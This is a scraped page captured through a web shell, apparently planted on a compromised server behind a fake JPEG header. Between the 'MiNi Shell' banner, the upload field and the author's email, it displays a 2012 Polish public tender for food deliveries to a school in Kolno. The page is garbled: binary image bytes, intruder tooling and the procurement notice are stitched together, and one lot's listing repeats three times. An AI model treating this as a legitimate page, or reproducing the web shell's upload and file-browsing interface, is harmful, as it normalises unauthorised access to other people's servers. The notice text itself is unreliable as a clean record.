JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120806/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120806/287436-N-2012.html

<p class="kh_header"><b>Kolno: Dostawa artykułów spożywczych w roku szkolnym 2012/2013 
do kuchni  w Zespole Szkół w Kolnie im. Jana Pawła II</b><br>
<b>Numer ogłoszenia: 287436 - 2012; data zamieszczenia: 06.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół w Kolnie im. Jana Pawła II , Kolno 27, 11-311 Kolno, woj. warmińsko-mazurskie, tel. 89 716 32 28, faks 89 716 32 28.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip-kolno.sprint.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna gminy-szkoła.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych w roku szkolnym 2012/2013 
do kuchni  w Zespole Szkół w Kolnie im. Jana Pawła II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: dostawa artykułów spożywczych w roku szkolnym 2012/2013 do kuchni w Zespole Szkół w Kolnie im. Jana Pawła II. 
Artykuły będą dostarczane do kuchni w Zespole Szkół w Kolnie im. Jana Pawła II w zależności od potrzeb i w ilościach zamawianych telefonicznie przez upoważnionego przedstawiciela szkoły.
Dostawa nastąpić musi nie później niż w ciągu 2 dni roboczych od dnia złożenia zamówienia.
Wykonawca otrzyma wynagrodzenie za faktycznie wykonane dostawy.
Przedmiot zamówienia został podzielony na 8 części (zadań).
Część 1 	Dostawa produktów zwierzęcych, mięsa i przetworów mięsnych (mięso wieprzowe, wołowe), mięsa i podrobów drobiowych
- produkty zwierzęce, mięso i produkty mięsne
- drób
- wieprzowina
- produkty mięsne (wędlina, szynka) 
- wątróbka drobiowa 	Nazwa  i  kod  określony we wspólnym Słowniku Zamówień  

CPV -  15100000 - 9
            15112000 - 6
            15113000 - 5
            15130000 - 8
            15112300-9
Część 1 	Dostawa produktów zwierzęcych, mięsa i przetworów mięsnych (mięso wieprzowe, wołowe), mięsa i podrobów drobiowych
- produkty zwierzęce, mięso i produkty mięsne
- drób
- wieprzowina
- produkty mięsne (wędlina, szynka) 
- wątróbka drobiowa 	Nazwa  i  kod  określony we wspólnym Słowniku Zamówień  

CPV -  15100000 - 9
            15112000 - 6
            15113000 - 5
            15130000 - 8
            15112300-9
Część 1 	Dostawa produktów zwierzęcych, mięsa i przetworów mięsnych (mięso wieprzowe, wołowe), mięsa i podrobów drobiowych
- produkty zwierzęce, mięso i produkty mięsne
- drób
- wieprzowina
- produkty mięsne (wędlina, szynka) 
- wątróbka drobiowa 	Nazwa  i  kod  określony we wspólnym Słowniku Zamówień  

CPV -  15100000 - 9
            15112000 - 6
            15113000 - 5
            15130000 - 8
            15112300-9
Część 2	Dostawa  oleju, produktów przemiału ziarna, owoców, warzyw i podobnych produktów przetworzonych, różnych produktów spożywczych
- olej, tłuszcze zwierzęce lub roślinne
- soki owocowe i warzywne
-produkty przemiału ziarna, skrobi i pr. skrobi
- różne produkty spożywcze
	Nazwa  i kod określony we Wspólnym Słowniku Zamówień 

CPV   15400000 - 2
           15320000 - 7
           15600000 - 4
           15800000 - 6

Część 3 	Dostawa produktów mleczarskich
	Nazwa  i kod określony we Wspólnym Słowniku Zamówień 
CPV - 15500000 - 3
Część 4 	Dostawa jaj 	Nazwa  i kod określony we Wspólnym Słowniku Zamówień 
CPV - 03142500-3
Część 5	Dostawa mrożonek: ryb  mrożonych, mrożonych warzyw i owoców oraz innych produktów głęboko mrożonych     
- ryby mrożone i pozostałe mięso ryby
- przetworzone owoce i warzywa	Nazwa  i kod określony we Wspólnym Słowniku Zamówień 

CPV - 15220000  - 6
           15330000 -  0
Część 6	Dostawa owoców, warzyw i podobnych produktów     

- owoce, warzywa i podobne produkty
- ziemniak 	Nazwa i kod określony we wspólnym Słowniku   Zamówień  CPV -15300000 - 1
           15310000 - 4
Część 7 	Dostawa świeżego pieczywa  i wyrobów piekarskich

- pieczywo świeże, wyroby piekarskie i ciastkarskie 	Nazwa i kod określony we Wspólnym Słowniku Zamówień CPV- 15.81.00.00 -  9
Część 8 	Dostawa ryb wędzonych

- ryba wędzona	Nazwa i kod określony we Wspólnym Słowniku Zamówień CPV- 15234000 - 7

Szczegółowy zakres dostaw z podziałem na części od 1 do 8 wyszczególniony został w załączniku nr 2 do SWIZ - kosztorys ofertowy. Części zamówienia nie mogą być dzielone przez wykonawców, oferty niezawierające pełnego zakresu przedmiotu zamówienia określonego w zadaniu częściowym zostaną odrzucone..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza możliwości udzielenia zamówień uzupełniających zgodnie z art. 67 ust.1 pkt.7 ustawy Prawo zamówień publicznych. Zamówienia uzupełniające mogą być udzielane po wystąpieniu szczególnie uciążliwych warunków atmosferycznych lub siły wyższej, mającej wpływ na dostawę zamówionych produktów (np. brak danego produktu na rynku z powodu suszy, deszczu, gradobicia i itp. oraz konieczność zastąpienia go innym produktem.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.11.20.00-6, 15.11.30.00-3, 15.13.00.00-8, 15.11.23.00-9, 15.40.00.00-2, 15.32.00.00-7, 15.60.00.00-4, 15.80.00.00-6, 15.50.00.00-3, 03.14.25.00-3, 15.22.00.00-6, 15.33.00.00-0, 15.30.00.00-1, 15.31.00.00-4, 15.81.00.00-9, 15.23.40.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 10.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania przez Wykonawcę warunków udziału w postępowaniu zostanie dokonana wg formuły: spełnia- nie spełnia. Opis sposobu dokonywania oceny spełniania tego warunku - warunek ten zostanie spełniony, jeśli Wykonawca dołączy oświadczenie, że posiada uprawnienia do wykonywania  określonej  działalności  lub czynności, jeżeli przepisy  prawa nakładają obowiązek  ich posiadania.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku wymaganego od Wykonawców zostanie dokonana wg formuły: spełnia - nie spełnia. Opis sposobu dokonywania oceny spełniania tego warunku - Wykonawca dołączy oświadczenie, że posiada odpowiednią wiedzę i doświadczenie niezbędne do wykonania zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania przez Wykonawcę warunków udziału w postępowaniu zostanie dokonana wg formuły: spełnia- nie spełnia. Warunek ten zostanie spełniony, jeśli wykonawca dołączy oświadczenie że dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania przez Wykonawcę warunków udziału w postępowaniu zostanie dokonana wg formuły: spełnia- nie spełnia. Warunek ten zostanie spełniony, jeśli wykonawca dołączy oświadczenie że dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania przez Wykonawcę warunków udziału w postępowaniu zostanie dokonana wg formuły: spełnia- nie spełnia.  Opis sposobu dokonywania oceny spełniania tego warunku: Wykonawca dołączy oświadczenie, że znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Formularz ofertowy wraz z kosztorysem ofertowym (w zależności od wybranej części zamówienia) - wypełniony i podpisany przez wykonawcę - zał. Nr 1 i Nr 2.
2) Oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 - zał. Nr 3
3) Oświadczenie o braku podstaw do wykluczenia z postępowania o udzielenie zamówienia z art. 24 
ust.1 i 2 - Prawo zamówień publicznych - zał. Nr 4
4) Parafowany wzór umowy (akceptacja), w zależności od wybranej części zamówienia- zał. Nr 5.
5) Pełnomocnictwo / upoważnienie do występowania w imieniu wykonawcy w przypadku, gdy dokumenty
składające się na ofertę podpisuje osoba nie uprawniona do reprezentowania wykonawcy (zgodnie z odpisem z Krajowego Rejestru Sądowego lub z zaświadczeniem o wpisie do ewidencji działalności gospodarczej). Pełnomocnictwo powinno być przedstawione w formie oryginału lub notarialnie poświadczonej kopii.
6) Pełnomocnictwo/ upoważnienie do reprezentowania w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy, w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia. Pełnomocnictwo powinno być przedstawione w formie oryginału lub notarialnie poświadczonej kopii.
7) Aktualny odpis z właściwego rejestru jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy.                                                                                                                                                
8) W przypadku korzystania z zasobów innych podmiotów, Wykonawca zobowiązany jest do przedłożenia pisemnego zobowiązania tego podmiotu do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
Szczegóły w części 6 SWIZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2. Zamawiający dopuszcza zmianę istotnych postanowień umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy wyłącznie w sytuacji gdy wprowadzenie tych zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawierania umowy lub zmiany te są korzystne dla zamawiającego. 
1) Możliwość zmiany umowy może nastąpić w przypadku: 
a) zmiana przepisów prawnych dotyczących zasad żywienia,  
b) likwidacja lub upadłość firmy (rozwiązanie umowy), 
c) przejęcie firmy przez inna firmę lub utworzenie filii (zmiana strony umowy).
2) Warunki dokonania wprowadzenia zmian umowy: 
a) inicjowana zmiana nastąpi na wniosek wykonawcy lub zamawiającego, 
b) dokonanie zmiany za zgodą zamawiającego, 
c) uzasadniona zmiana prawidłowej realizacji przedmiotu umowy, 
d) forma pisemna w postaci aneksu pod rygorem nieważności umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip-kolno.sprint.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół w Kolnie im. Jana Pawła II, Kolno 27, 11-311 Kolno, woj: warmińsko-mazurskie (budynek Gimnazjum) sekretariat pok. nr 4..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.08.2012 godzina 09:00, miejsce: Zespół Szkół w Kolnie im. Jana Pawła II, Kolno 27, 11-311 Kolno, woj: warmińsko-mazurskie (budynek Gimnazjum) sekretariat pok. nr 4..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com